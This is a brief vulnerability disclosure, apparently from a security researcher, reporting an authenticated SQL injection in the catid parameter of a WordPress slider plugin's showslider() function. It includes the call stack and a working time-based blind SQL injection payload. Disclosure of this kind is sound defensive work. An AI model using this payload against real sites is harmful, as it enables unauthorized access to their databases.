Hello,
Authenticated users (like editors etc.) can execute arbitrary SQL commands (there is no CSRF protection).
1. SQL injection (showslider())
Method: GET
Vulnerable parameter: catid
Example PHP callstack:
sliders_huge_it_slider [/slider-image/slider.php:517]
showslider [/slider-image/sliders.php:96]
wpdb::get_var
Verification:
...
Parameter: catid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: page=sliders_huge_it_slider&catid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))aHzR)
...
--
Regards,
Marcin Probola,